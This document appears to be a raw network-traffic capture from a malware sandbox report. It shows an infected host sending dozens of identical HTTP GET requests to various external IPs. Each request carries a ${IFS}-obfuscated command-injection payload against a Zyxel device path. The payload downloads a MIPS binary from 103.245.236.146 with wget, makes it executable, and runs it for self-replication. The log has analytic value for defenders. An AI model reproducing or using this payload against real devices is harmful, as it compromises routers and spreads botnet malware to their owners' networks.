                                                Jan 29, 2024 07:07:44.231388092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3214192.168.2.235172618.23.235.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.231430054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3215192.168.2.2335894209.196.11.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.231460094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3216192.168.2.235841073.244.117.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.231487989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3217192.168.2.2343138188.22.222.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.231532097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3218192.168.2.2360142176.190.124.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.231565952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3219192.168.2.233854635.197.161.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.231600046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3220192.168.2.2343406198.192.177.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.231625080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3221192.168.2.233806682.169.94.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.231671095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3222192.168.2.2341236192.79.118.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.231698990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3223192.168.2.2360584125.197.29.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.231750011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3224192.168.2.2359444129.146.195.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.231781006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3225192.168.2.234988266.63.8.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.231806993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3226192.168.2.2355430139.35.31.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.231837034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3227192.168.2.2339058114.173.205.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.231868982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3228192.168.2.233567035.78.226.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.231933117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3229192.168.2.235583254.255.162.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.231944084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3230192.168.2.2344770102.189.42.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.232017040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3231192.168.2.2346862213.48.172.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.232048988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3232192.168.2.234225687.174.57.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.232074022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3233192.168.2.2345258139.128.0.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.232117891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3234192.168.2.2335646124.192.1.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.232141972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3235192.168.2.2343778181.82.37.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.232182026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3236192.168.2.2344886120.196.95.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.232213974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3237192.168.2.2336758185.33.155.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.232253075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3238192.168.2.235496695.125.84.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.232294083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3239192.168.2.2340242168.56.13.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.232321978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3240192.168.2.234805637.116.220.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.232350111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3241192.168.2.2340884163.103.154.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.232403994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3242192.168.2.234848231.7.88.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.232433081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3243192.168.2.234819613.117.61.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.232458115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3244192.168.2.2357242139.125.200.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.232523918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3245192.168.2.233762490.176.26.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.232549906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3246192.168.2.235956414.92.77.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.232583046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3247192.168.2.2346756196.88.138.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.232613087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3248192.168.2.2336934144.114.119.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.232670069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3249192.168.2.235428072.74.131.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.232697964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3250192.168.2.233307295.130.0.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.232732058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3251192.168.2.234899047.223.104.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.232774019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3252192.168.2.2342790158.118.183.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.232820034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3253192.168.2.2338126216.130.122.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.232860088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3254192.168.2.2360188137.198.127.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.232896090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3255192.168.2.234595879.232.164.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.232942104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3256192.168.2.233543234.168.52.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.232971907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3257192.168.2.234366894.65.10.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.233023882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3258192.168.2.235832232.180.34.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.233057976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3259192.168.2.2341510160.153.110.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.233091116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3260192.168.2.233619083.255.213.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.233139038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3261192.168.2.2360794159.188.21.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.233169079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3262192.168.2.235837627.124.86.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.233222008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3263192.168.2.23442661.209.96.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.233237028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3264192.168.2.2333638124.182.147.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.233287096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3265192.168.2.2341840130.123.3.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.233319998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3266192.168.2.2343944122.197.105.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.233377934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3267192.168.2.2359482139.97.62.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.233416080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3268192.168.2.234557892.14.72.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.233438015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3269192.168.2.2356738126.139.135.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.233463049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3270192.168.2.2346416130.108.107.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.233516932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3271192.168.2.2352440129.180.19.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.233536005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3272192.168.2.2333236119.117.111.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.233594894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3273192.168.2.2347678151.22.25.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.233623028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3274192.168.2.2340694171.72.15.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.233661890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3275192.168.2.2335324174.122.250.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.233692884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3276192.168.2.2337100218.239.115.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.233726978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3277192.168.2.235128041.240.226.137443
                                                TimestampBytes transferredDirectionData
